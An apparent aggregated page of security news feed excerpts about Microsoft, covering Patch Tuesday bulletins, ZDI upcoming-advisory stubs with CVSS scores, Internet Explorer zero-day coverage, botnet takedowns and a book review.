==> REVIEW: “Security and Privacy for Microsoft Office 2010 Users”, Mitch Tulloch

http://blogs.securiteam.com/index.php/feed/ BKSCPRO2.RVW 20121122 “Security and Privacy for Microsoft Office 2010 Users”, Mitch Tulloch, 2012, 0735668833, U$9.99 %A Mitch Tulloch info@mtit.com www.mtit.com %C 1 Microsoft Way, Redmond, WA 98052-6399 %D 2012 %G 0735668833 %I Microsoft Press %O U$9.99 800-MSPRESS fax: 206-936-7329 mspinput@microsoft.com %O http://www.amazon.com/exec/obidos/ASIN/0735668833/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0735668833/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0735668833/robsladesin03-20 %O Audience n- Tech 1 Writing 1 (see revfaq.htm for [...]

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put for sell, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft, with help from feds, delivers body bleep to massive fraud ring

http://feeds.arstechnica.com/arstechnica/security?format=xml Massive online fraud syndicate that targeted online bank accounts disrupted.

==> Think your Skype messages get end-to-end encryption? Think again

http://feeds.arstechnica.com/arstechnica/security?format=xml Ars catches Microsoft accessing links we sent in our test messages.

==> Microsoft Citadel takedown ultimately counterproductive

http://feeds.feedburner.com/HelpNetSecurity Last week's disruption of nearly 1500 Citadel botnets believed to be responsible for over half a billion US dollars in financial fraud and affecting more than five million people in 90 countries has b...

==> The future of online authentication

http://feeds.feedburner.com/HelpNetSecurity Recently, Twitter has introduced 2-factor authentication the latest in a long list of large-scale web services that have taken this step including Google, Microsoft and Dropbox. Why have these organ...

==> ZDI-CAN-1909: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release

==> ZDI-CAN-1907: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Peter 'corelanc0d3r' Van Eeckhoutte - Corelan - www.corelangcv.com' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1893: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1882: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'ZombiE' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1877: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1737: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1873: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.2 (AV:L/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1867: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Arthur Gerkis' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1863: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1861: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Peter 'corelanc0d3r' Van Eeckhoutte' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1859: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1858: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Jose A. Vazquez of Yenteasy - Security Research - ' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1856: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by '80ceb6400c43bd3fa9f1ef561f7c51d929fe0199' was reported to the affected vendor on: 2013-05-13, 28 days ago. The vendor is given until 2013-11-09 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a

==> ZDI-CAN-1854: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1848: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1847: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1843: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Bluesea' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1842: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1841: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van aka @__suto' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1839: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1838: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1837: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Bluesea' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1805: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1799: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1781: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1822: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1819: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1818: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Simon Zuckerbraun' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1814: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1808: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1806: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1803: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1800: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair and Amol Naik' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1796: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1711: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1682: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1789: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Omair' was reported to the affected vendor on: 2013-03-22, 80 days ago. The vendor is given until 2013-09-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1786: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1754: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1771: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1770: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1769: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1753: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1720: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 126 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1709: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 126 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 202 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher' and ' Microsoft & Paul Bates' and ' Microsoft' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 214 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletinsa couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet ExplorerMS12-071. Andrew Storms, director of security operations for nCircle, declares, Topping our patch immediately list this month is the drive-by exploit affecting Internet Explorer 9. Its fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10. To read this article in full or to leave a comment, please click here

==> Windows 8 raises the bar for PC security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Windows 8 is officially here. Microsoft held an event in New York yesterday to launch the new OS, and spent a lot of time talking about cool features and introducing a plethora of hardware options available with Windows 8. One thing Microsoft didnt talk about much, though, is securityand the new features in Windows 8 that will keep your PC and data safe. As with every previous iteration of the Windows operating system, Windows 8 is the most secure version yet. That really goes without saying, and amounts to little more than marketing hype. Each new version includes the security features of the previous one, but improves on them and adds new features to address potential risks missed by the predecessor. Not to suggest that Windows 8 is invulnerable, but it should be expected that its more secure than Windows 7, or any previous version of Windows. Windows 8 StartWindows 8 includes a number of features that make it more secure than Windows 7. So, what makes Windows 8 more secure? Perhaps the biggest security feature of Windows 8 is really not a Microsoft or Windows 8 thing at all: UEFI (Unified Extensible Firmware Interface). UEFI is an open standard used to replace the archaic BIOS typically found on PC hardware. To read this article in full or to leave a comment, please click here

==> Kaspersky Lab announces a brand-new OS focused on security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The past two years or so have brought a new breed of scary malware to the forefront of public attention, including the infamous Stuxnet worm that was discovered back in 2010. Following hard on Stuxnet's proverbial heels, of course, were Duqu, Flame, Gauss, Shamoon, and Wiper, to name just a few examples. These new threats are generally thought to be state-sponsored in many cases and developed for cyberespionage against specific targets; another factor in common is that they tend to work through Microsoft Windows. It's long been known that Linux offers numerous security advantages over both Windows and Macs, of course, but security research firm Kaspersky Lab--which played a key role in identifying many of these frightening pieces of malware--apparently has other ideas. To read this article in full or to leave a comment, please click here

==> Microsoft plans patch for critical flaw in Word next Tuesday

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Its the first Thursday of October. Do you know what happens on the first Thursday of each month? Microsoft provides an advance notification of the security bulletins it plans to release on the second Tuesday of the monthmore commonly known as Patch Tuesday. Following an unusually light Patch Tuesday in September, Microsoft was forced to deal with the specter of a zero-day exploit being used in the wild to attack Internet Explorer. Microsoft responded with an out-of-band patch reflecting the urgent nature of the threat. IT admins will be a little busier in October. According to the Microsoft Security Bulletin Advance Notification for October 2012, Microsoft has a total of seven new security bulletins slated for release next week. Six of the seven are rates merely as Important, while the seventha patch for a flaw affecting all supported versions of Microsoft Wordis rated as Critical for Word 2010. To read this article in full or to leave a comment, please click here

==> Microsoft pushes out critical security updates for Internet Explorer

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has published an out-of-band security bulletinMS12-063to address a vulnerability that is being actively exploited in attacks in the wild. In addition, Microsoft also released an update to resolve a critical flaw in Adobe Flash in Internet Explorer 10which is the default browser in Windows 8 and Windows Server 2012. Microsoft has responded quickly in its investigation of reports that a zero-day vulnerability in Internet Explorer is being actively exploited. Microsoft issued a security advisory with workarounds, and mitigating factors to help customers guard against attacks pending a fix. Then, it released a one-click Fix-It tool to protect customers while kicking its developers in to high gear to create a more permanent fix. Microsoft squashes some bugs in Internet Explorer with new patches released today. Andrew Storms, director of security operations for nCircle, praised Microsofts quick turnaround, but he also feels there is more on the line than just protecting customers from attacks. Microsoft had to respond very quickly to this bug. In addition to the serious security threats it posed to their customers, Internet Explorers market share is at risk. Many security pundits and organizations have been telling users to switch browsers until a patch is available. I'm sure that got the attention of a lot of Microsoft executives. To read this article in full or to leave a comment, please click here

==> What you need to know about the Internet Explorer zero-day attacks

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer Web browser is being actively attacked in the wild. While Microsoft works diligently to crank out a patch, its important for businesses and consumers to understand the threat, and the steps that can be taken to avoid compromise while you wait. Microsoft has published a security advisory acknowledging the threat. According to Microsoft, the zero-day exploit affects Internet Explorer 7, 8, 9. Internet Explorer 10 is not impacted, but its not completely safe because it remains vulnerable to flaws in the embedded Adobe Flash. The Microsoft advisory includes some tips that can be used to defend against this threat pending a patch for the underlying flaw. Microsoft recommends that customers use the Enhanced Mitigation Experience Toolkit (EMET) to implement mitigations that can prevent the zero-day exploit from working. In addition, Microsoft advises customers to set the Internet and local intranet security zone in Internet Explorer to High to block ActiveX controls and Active Scripting from running, or at least configure it to prompt before executing. Andrew Storms, director of security operations for nCircle, puts the threat in perspective. If your systems are running IE, you are at risk, but dont panic. The reality is its just one more zero-day and weve seen an awful lot of them come and go. To read this article in full or to leave a comment, please click here

==> Microsoft confirms patch for Flash in IE10 coming soon

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Adobe recently issued an update for the popular Flash Player utility to patch critical flaws that could allow an attacker to run malicious code on the target system. But, if youre using Windows 8, the version of Flash that Microsoft has embedded in Internet Explorer 10 is still vulnerable. Good news, thoughan update is forthcoming to address that problem. Adobe responds quickly to patch identified vulnerabilities, and most Windows users are conditioned to apply security updates as theyre released, but Microsoft is responsible for updating Flash in its Web browser. Windows 8 hasnt yet officially launched, though, and Microsofts initial response was that Flash would not be updated until after October 26 when Windows 8 becomes available to the general public. Microsoft baked Flash into IE10, so it's responsible for patching it. A couple of the flaws addressed by Adobe were given its highest threat warning level, and are associated with attacks that are already circulating in the wild. Last week, Adobe confirmed that Windows 8 users are still vulnerable to these threats. I asked Microsoft about speculation that a patch is imminent. Yunsun Wee, Director of Microsoft Trustworthy Computing, replied with this statement: In light of Adobes recently released security updates for its Flash Player, Microsoft is working closely with Adobe to release an update for Adobe Flash in IE10 to protect our mutual customers. To read this article in full or to leave a comment, please click here

==> Get ready: Microsoft is raising the bar for encryption keys

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Great news! Next Tuesday is already Patch Tuesday for September, but Microsoft only has a couple of relatively minor updates lined up. Dont get too comfortable, thoughyou need to prepare for the changes Microsoft is making next month for cryptographic keys. Lets start with Patch Tuesday. September is a dramatic departure from previous months. Unlike the many months that have been loaded down with multiple Critical updates, or the fact that Internet Explorer has been updated monthly for the past few months, Microsoft only has two security bulletins scheduled for this month. Microsoft will soon consider any cryptographic key less than 1024 bits invalid. The last couple of months have each had nine new security bulletins, and the average per month through August is 7.5. Two is a manageable number that will make many IT admins very happy. Throw in the fact that both of the security bulletins are rated as Important, and that they impact software or platforms that many businesses dont even use, and some IT admins may essentially get this Patch Tuesday off free and clear. Of course, many IT admins are still trying to catch up from previous months, and can use the break to finish deploying the patches they already have. Then, theres the Java patch from Oracle that probably needs urgent attention if you havent already implemented it. To read this article in full or to leave a comment, please click here

==> Microsoft and Adobe Keep IT Busy with Critical Security Patches

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Its Patch Tuesday again. This month is busier than most because on top of Microsofts security bulletins, Adobe is also releasing updates for Reader and Acrobat. Lets start with Microsoft. There are nine new security bulletins for August, which resolve 26 different vulnerabilities. There are five rated as Criticalincluding a patch for Internet Explorer for the third consecutive month--and four Important. Microsoft and Adobe released a barrage of new patches and updates. Tyler Reguly, director of security research and development for nCircle, says, The most interesting thing this month is the release of patches for two wormable issues, MS12-053 and MS12-054. These only affect the oldest-supported Windows platforms and really speaks well of the improvements Microsoft has made to their security efforts over the years. Andrew Storms, director of security operations for nCircle agrees with Reguly, stressing the potential impact of MS12-053. This one has the potential for serious impact because it is network aware and no authentication is required. If you have XP on your network, then get the mitigations for this one installed ASAP. To read this article in full or to leave a comment, please click here

==> Microsoft Rolls BlueHat Prize Finalist's Concept Into EMET 3.5

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft announced a new version of its EMET (Enhanced Mitigation Experience Toolkit) software at the Blackhat conference in Las Vegas. Whats unique about the EMET 3.5 Technology Preview is that it includes new defenses inspired by one of Microsofts BlueHat Prize finalists. EMET is a free utility from Microsoft that adds an extra layer of defense to prevent vulnerabilities from being successfully exploited. The software is a collection of tools and mitigation techniques that can be applied to protect against attacks. Guard against attacks with Microsoft's new EMET 3.5. One class of attacks that previous versions of EMET have not been armed to defend against effectively is Return Oriented Programming (ROP) attacks. Thanks to ROPGuard--a defense technology submitted for Microsofts BlueHat contest--EMET 3.5 will have the tools available to defend against ROP attacks. In less than three months, we successfully integrated one of the BlueHat Prize finalists technologies with EMET 3.5 Technology Preview to help make software significantly more resistant to exploitation, said Mike Reavey, senior director of the Microsoft Security Response Center at Microsoft in a press release. To read this article in full or to leave a comment, please click here

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word.

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off Google made the news with this article in the Financial Timesstating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches […]

==> Cross Your T's and Dot Your Filenames

